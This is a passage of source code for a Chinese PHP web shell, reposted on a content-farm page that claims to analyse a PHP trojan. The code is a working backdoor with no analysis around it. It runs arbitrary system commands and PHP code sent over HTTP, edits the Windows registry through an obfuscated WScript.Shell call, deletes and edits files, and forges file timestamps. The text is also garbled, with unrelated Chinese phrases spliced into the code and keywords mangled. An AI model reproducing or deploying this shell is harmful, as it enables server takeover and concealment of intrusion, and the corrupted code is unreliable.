echo “配置参数 “.$_post[‘phpvarname’].” 检测结果: “.getphpcfg($_post[‘phpvarname’]).””;

}

// 读取注册表

elif(($regread) and !empty($_post[‘readregname’])) {

$shell= &new com(‘wsc’.’rip’.’t.sh’.’ell’);

var_dump(@$shell->regread($_post[‘readregname’]));

}

// 写入注册表

elif(($regwrite) and !empty($_post[‘writeregname’]) and !empty($_post[‘regtype’]) and !empty($_post[‘regval’])) {

$shell= &new com(‘w’.’scr’.’ipt.s’.’hell’);

$a = @$shell->regwrite($_post[‘writeregname’], $_post[‘regval’], $_post[‘regtype’]);

echo ($a==’0′) ? “写入注册表健值成功!” : “写入 “.$_post[‘regname’].”, “.$_post[‘regval’].”, “.$_post[‘regtype’].” 失败!”;

}

// 删除注册表

elif(($regdelete) and !empty($_post[‘delregname’])) {

$shell= &new com(‘ws’.’cri’.’pt.s’.’he’.’ll’);

$a = @$shell->regdelete($_post[‘delregname’]);

echo ($a==’0′) ? “删除注册表健值成功!” : “删除 “.$_post[‘delregname’].” 失败!”;

}

el {

echo “$notice”;

echo “<a href=”\” href=”\””?dir=c:/program%20files/\”>program</a> | <a href=”\” href=”\””?dir=c:/documents%20and%20ttings/all%20urs/application%20data/symantec/pcanywhere\”>pcanywhere</a> | <a href=”\” href=”\””?dir=c:/documents%20and%20ttings/all%20urs/「开始」菜单/程序\”>开始程序</a> | <a href=”\” href=”\””?dir=c:/documents%20and%20ttings/all%20urs\”>allurs</a> | <a href=”\” href=”\””?dir=c:/program files/rhinosoft.com/rv-u\”>rv-u</a> | “;

for ($i=66;$i<=90;$i++){$drive= chr($i).’:’;

if (is_dir($drive.”/”)){$vol=shell(“vol $drive”);if(empty($vol))$vol=$drive;echo ” <a title=\”$drive/\” href=”\” href=”\””?dir=$drive/\”>$drive\\</a>”;}

}

}

echo “</b></p>\n”;

/*===================== 执行操作 结束 =====================*/

if (!ist($_get[‘action’]) or empty($_get[‘action’]) or ($_get[‘action’] == “dir”)) {

$tb->tableheader();

?>

<tr bgcolor=”#cccccc”>

<td aligen=”center” nowrap width=”27%”><b>文件</b></td>

<td align=”center” nowrap width=”16%”><b>创建日期</b></td>

<td align=”center” nowrap width=”16%”><b>最后修改</b></td>

<td align=”center” nowrap width=”11%”><b>大小</b></td>

<td align=”center” nowrap width=”6%”><b>属性</b></td>

<td align=”center” nowrap width=”24%”><b>操作</b></td>

</tr>

<form action=”” method=”post”>

<?php

// 目录列表

$dirs=@opendir($dir);

$dir_i = ‘0’;

while ($file=@readdir($dirs)) {

$filepath=”$dir/$file”;

$a=@is_dir($filepath);

if($a==”1″){

if($file!=”..” && $file!=”.”){

$ctime=@date(“y-m-d h:i:s”,@filectime($filepath));

$mtime=@date(“y-m-d h:i:s”,@filemtime($filepath));

$dirperm=substr(ba_convert(fileperms($filepath),10,8),-4);

echo “<tr class=”.getrowbg().”>\n”;

echo ” <td style=”\” style=”\””padding-left: 5px;\”><input type=checkbox value=$file name=dl[]> [<a href=”\” href=”\””?dir=”.urlencode($dir).”/”.urlencode($file).”\”><font color=\”#006699\”>$file</font></a>]</td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”>$ctime</td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”>$mtime</td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”><a href=”\” href=”\””?action=arch&dir=”.$filepath.”\”>arch</a></td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”><a href=”\” href=”\””?action=fileperm&dir=”.urlencode($dir).”&file=”.urlencode($file).”\”>$dirperm</a></td>\n”;

echo ” <td align=\”center\” nowrap>| <a href=”\” href=”\””#\” onclick=\”really(‘”.urlencode($dir).”‘,'”.urlencode($file).”‘,’你确定要删除 $file 目录吗? \\n\\n如果该目录非空,此次操作将会删除该目录下的所有文件!’,’1′)\”>删除</a> | <a href=”\” href=”\””?action=rename&dir=”.urlencode($dir).”&fname=”.urlencode($file).”\”>改名</a> |</td>\n”;

echo “</tr>\n”;

$dir_i++;

} el {

if($file==”..”) {

echo “<tr class=”.getrowbg().”>\n”;

echo ” <td nowrap colspan=\”6\” style=”\” style=”\””padding-left: 5px;\”><a href=”\” href=”\””?dir=”.urlencode($dir).”/”.urlencode($file).”\”>返回上级目录</a></td>\n”;

echo “</tr>\n”;

}

}

}

}// while

@clodir($dirs);

?>

<tr bgcolor=”#cccccc”>

<td colspan=”6″ height=”5″></td>

</tr>

<?

// 文件列表

$dirs=@opendir($dir);

$file_i = ‘0’;

while ($file=@readdir($dirs)) {

$filepath=”$dir/$file”;

$a=@is_dir($filepath);

if($a==”0″){

$size=@filesize($filepath);

$size=$size/1024 ;

$size= @number_恩施大峡谷旅游攻略format($size, 3);

if (@filectime($filepath) == @filemtime($filepath)) {

$ctime=@date(“y-m-d h:i:s”,@filectime($filepath));

$mtime=@date(“y-m-d h:i:s”,@filemtime($filepath));

} el {

$ctime=”<span class=\”redfont\”>”.@date(“y-m-d h:i:s”,@filectime($filepath)).”</span>”;

$mtime=”<span class=\”redfont\”>”.@date(“y-m-d h:i:s”,@filemtime($filepath)).”</span>”;

}

@$fileperm=substr(ba_convert(@fileperms($filepath),10,8),-4);

echo “<tr class=”.getrowbg().”>\n”;

echo ” <td style=”\” style=”\””padding-left: 5px;\”>”;

echo “<input type=checkbox value=$file name=dl[]>”;

echo “<a href=”\” href=”\””$filepath\” target=\”_blank\”>$file</a></td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”>$ctime</td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”>$mtime</td>\n”;

echo ” <td align=\”right\” nowrap class=\”smlfont\”><span class=\”redfont\”>$size</span> kb</td>\n”;

echo ” <td align=\”center\” nowrap class=\”smlfont\”><a href=”\” href=”\””?action=fileperm&dir=灯会221;.urlencode($dir).”&file=”.urlencode($file).”\”>$fileperm</a></td>\n”;

echo ” <td align=\”center\” nowrap><a href=”\” href=”\””?downfile=”.urlencode($filepath).”\”>下载</a> | <a href=”\” href=”\””?action=editfile&dir=”.urlencode($dir).”&editfile=”.urlencode($file).”\”>编辑</a> | <a href=”\” href=”\””#\” onclick=\”really(‘”.urlencode($dir).”‘,'”.urlencode($filepath).”‘,’你确定要删除 $file 文件吗?’,’2′)\”>删除</a> | <a href=”\” href=”\””?action=rename&dir=”.urlencode($dir).”&fname=”.urlencode($filepath).”\”>改名</a> | <a href=”\” href=”\””?action=newtime&dir=”.urlencode($dir).”&file=”.urlencode($filepath).”\”>时间</a></td>\n”;

echo “</tr>\n”;

$file_i++;

}

}// while

@clodir($dirs);

if(get_cfg_var(‘safemode’))$z = “<a href=”\” href=”\””#\” title=\”使用说明\” onclick=\”alert(‘php为安全模式尽量少打包内容以免脚本超时\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。’)\”>(?)</a>”;

el $z = “<a href=”\” href=”\””#\” title=\”使用说明\” onclick=\”alert(‘php运行非安全模式,打包大件请等啊等啊等啊等\\n\\n填写文件名则把文件保存在本地方便操作,不填则直接下载。’)\”>(?)</a>”;

$tb->tdbody(‘<table width=”100%” border=”0″ cellpadding=”2″ cellspacing=”0″ align=”center”><tr><td>’.$tb->makeinput(‘chkall’,’on’,’onclick=”checkall(this.form)”‘,’checkbox’,’30’,”).’ 本地文件:’.$tb->makeinput(‘localfile’,”,”,’text’,’15’).”.$tb->makeinput(‘downrar’,’选中打包下载或本地保存’,”,’submit’).’ ‘.$z.'</td><td align=”right”>’.$dir_i.’ 个目录 / ‘.$file_i.’ 个文件</td></tr></table>’,’center’,getrowbg(),”,”,’6′);

echo “</form>\n”;

echo “</table>\n”;

}// end dir

elif ($_get[‘action’] == “editfile”) {

if(empty($newfile)) {

$filename=”$dir/$editfile”;

$fp=@fopen($filename,”r”);

$contents=@fread($fp, filesize($filename));

@fclo($fp);

$contents=htmlspecialchars($contents);

}el{

$editfile=$newfile;

$filename = “$dir/$editfile”;

}

$action = “?dir=”.urlencode($dir).”&editfile=”.$editfile;

$tb->tableheader();

$tb->formheader($action,’新建/编辑文件’);

$tb->tdbody(‘当前文件: ‘.$tb->makeinput(‘editfilename’,$filename).’ 输入新文件名则建立新文件 php代码加密: <input type=”checkbox” name=”change” value=”yes” onclick=”javascript:alert(\’这个功能只可以用来加密或是压缩完整的php代码。\\n\\n非php代码或不完整php代码或不支持gzinflate函数请不要使用!\’)”> ‘);

$tb->tdbody($tb->maketextarea(‘filecontent’,$contents));

$tb->makehidden(‘do’,’doeditfile’);

$tb->formfooter(‘1′,’30’);

}//end editfile

elif ($_get[‘action’] == “rename”) {

$nowfile = (ist($_post[‘newname’])) ? $_post[‘newname’] : baname($_get[‘fname’]);

$action = “?dir=”.urlencode($dir).”&fname=”.urlencode($fname);

$tb->tableheader();

$tb->formheader($action,’修改文件名’);

$tb->makehidden(‘oldname’,$dir.”/”.$nowfile);

$tb->makehidden(‘dir’,$dir);

$tb->tdbody(‘当前文件名: ‘.baname($nowfile));

$tb->tdbody(‘改名为: ‘.$tb->makeinput(‘newname’));

$tb->makehidden(‘do’,’rename’);

$tb->formfooter(‘1′,’30’);

}//end rename

elif ($_get[‘action’] == “eval”) {

$action = “?dir=”.urlencode($dir).””;

$tb->tableheader();

$tb->formheader(”.$action.’ “target=”_blank’ ,’执行php脚本’);

$tb->tdbody($tb->maketextarea(‘phpcode’,$contents));

$tb->formfooter(‘1′,’30’);

}

elif ($_get[‘action’] == “fileperm”) {

$action = “?dir=”.urlencode($dir).”&file=”.$file;

$tb->tableheader();

$tb->formheader($action,’修改文件属性’);

$tb->tdbody(‘修改 ‘.$file.’ 的属性为: ‘.$tb->makeinput(‘fileperm’,substr(ba_convert(fileperms($dir.’/’.$file),10,8),-4)));

$tb->makehidden(‘file’,$file);

$tb->makehidden(‘dir’,urlencode($dir));

$tb->makehidden(‘do’,’editfileperm’);

$tb->formfooter(‘1′,’30’);

}//end fileperm

elif ($_get[‘action’] == “newtime”) {

$action = “?dir=”.urlencode($dir);

$cachemonth = array(‘january’=>1,’february’=>2,’march’=>3,’april’=>4,’may’=>5,’june’=>6,’july’=>7,’august’=>8,’ptember’=>9,’october’=>10,’november’=>11,’december’=>12);

$tb->tableheader();

$tb->formheader($action,’克隆文件最后修改时间’);

$tb->tdbody(“修改文件: “.$tb->makeinput(‘curfile’,$file,’readonly’).” → 目标文件: “.$tb->makeinput(‘tarfile’,’需填完整路径及文件名’),’center’,’2′,’30’);

$tb->makehidden(‘do’,’domodtime’);

$tb->formfooter(”,’30’);

$tb->formheader($action,’自定义文件最后修改时间’);

$tb->tdbody(‘<br><ul><li>有效的时间戳典型范围是从格林威治时间 1901 年 12 月 13 日 星期五 20:45:54 到 2038年 1 月 19 日 星期二 03:14:07<br>(该日期根据 32 位有符号整数的最小值和最大值而来)</li><li>说明: 日取 01 到 30 之间, 时取 0 到 24 之间, 分和秒取 0 到 60 之间!</li></ul>’,’left’);

$tb->tdbody(‘当前文件名: ‘.$file);

$tb->makehidden(‘curfile’,$file);

$tb->tdbody(‘修改为: ‘.$tb->makeinput(‘year’,’1984′,”,’text’,’4′).’ 年 ‘.$tb->makelect(array(‘name’=>’month’,’option’=>$cachemonth,’lected’=>’october’)).’ 月 ‘.$tb->makeinput(‘data’,’18’,”,’text’,’2′).’ 日 ‘.$tb->makeinput(‘hour’,’20’,”,’text’,’2′).’ 时 ‘.$tb->makeinput(‘minute’,’00’,”,’text’,’2′).’ 分 ‘.$tb->makeinput(‘cond’,’00’,”,’text’,’2′).’ 秒’,’center’,’2′,’30’);

$tb->makehidden(‘do’,’modmytime’);

$tb->formfooter(‘1′,’30’);

}//end newtime

elif ($_get[‘action’] == “shell”) {

$action = “??action=shell&dir=”.urlencode($dir);

$tb->tableheader();

$tb->tdheader(‘webshell mode’);

if (substr(php_os, 0, 3) == ‘win’) {

$program = ist($_post[‘program’]) ? $_post[‘program’] : “c:\winnt\system32\cmd.exe”;

$prog = ist($_post[‘prog’]) ? $_post[‘prog’] : “/c net start > “.$pathname.”/log.txt”;

echo “<form action=\”?action=shell&dir=”.urlencode($dir).”\” method=\”post\”>\n”;

$tb->tdbody(‘无回显运行程序 → 文件: ‘.$tb->makeinput(‘program’,$program).’ 参数: ‘.$tb->makeinput(‘prog’,$prog,”,’text’,’40’).’ ‘.$tb->makeinput(”,’run’,”,’submit’),’center’,’2′,’35’);

$tb->makehidden(‘do’,’programrun’);

echo “</form>\n”;

}

echo “<form action=\”?action=shell&dir=”.urlencode($dir).”\” method=\”post\”>\n”;

if(ist($_post[‘cmd’])) $cmd = $_post[‘cmd’];

$tb->tdbody(‘提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容. ‘);

$tb->tdbody(‘proc_open函数假设不是默认的winnt系统请自行设置使用,自行修改记得写退出,否则会在主机上留下一个未结束的进程.’);

$tb->tdbody(‘proc_open函数要使用的cmd程序的位置:’.$tb->makeinput(‘cmd’,$cmd,”,’text’,’30’).'(要是是linux系统还是大大们自己修改吧)’);

$execfuncs = (substr(php_os, 0, 3) == ‘win’) ? array(‘system’=>’system’,’passthru’=>’passthru’,’exec’=>’exec’,’shell_exec’=>’shell_exec’,’popen’=>’popen’,’wscript’=>’wscript.shell’,’proc_open’=>’proc_open’) : array(‘system’=>’system’,’passthru’=>’passthru’,’exec’=>’exec’,’shell_exec’=>’shell_exec’,’popen’=>’popen’,’proc_open’=>’proc_open’);

$tb->tdbody(‘选择执行函数: ‘.$tb->makelect(array(‘name’=>’execfunc’,’option’=>$execfuncs,’lected’=>$execfunc)).’ 输入命令: ‘.$tb->makeinput(‘command’,$_post[‘command’],”,’text’,’60’).’ ‘.$tb->makeinput(”,’run’,”,’submit’));

?>

<tr class=”condalt”>

<td align=”center”><textarea name=”textarea̶我们怎样听到声音1; cols=”100″ rows=”25″ readonly><?php

if (!empty($_post[‘command’])) {

if ($execfunc==”system”) {

system($_post[‘command’]);

} elif ($execfunc==”passthru”) {

passthru($_post[‘command’]);

} elif ($execfunc==”exec”) {

$result = exec($_post[‘command’]);

echo $result;

} elif ($execfunc==”shell_exec”) {

$result=shell_exec($_post[‘command’]);

echo $result;

} elif ($execfunc==”popen”) {

$pp = popen($_post[‘command’], ‘r’);

$read = fread($pp, 2096);

echo $read;

pclo($pp);

} elif ($execfunc==”wscript”) {

$wsh = new com(‘w’.’scr’.’ip’.’t.she’.’ll’) or die(“php create com wshshell failed”);

$exec = $wsh->exec (“cm”.”d.e”.”xe /c “.$_post[‘command’].””);

$stdout = $exec->stdout();

$stroutput = $stdout->readall();

echo $stroutput;

} elif($execfunc==”proc_open”){

$descriptorspec = array(

0 => array(“pipe”, “r”),

1 => array(“pipe”, “w”),

2 => array(“pipe”, “w”)

);

$process = proc_open(“”.$_post[‘cmd’].””, $descriptorspec, $pipes);

if (is_resource($process)) {

// 写命令

fwrite($pipes[0], “”.$_post[‘command’].”\r\n”);

fwrite($pipes[0], “exit\r\n”);

fclo($pipes[0]);

// 读取输出

while (!feof($pipes[1])) {

echo fgets($pipes[1], 1024);

}

fclo($pipes[1]);

while (!feof($pipes[2])) {

echo fgets($pipes[2], 1024);

}

fclo($pipes[2]);

proc_clo($process);

}

} el {

system($_post[‘command’]);

}

}

?>

本文发布于:2023-04-06 14:30:54,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/10b6596f64e95998170d3f0d1fef4b53.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:php 木马的分析(加密破解).doc

本文 PDF 下载地址:php 木马的分析(加密破解).pdf

标签:文件   目录   文件名   程序
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图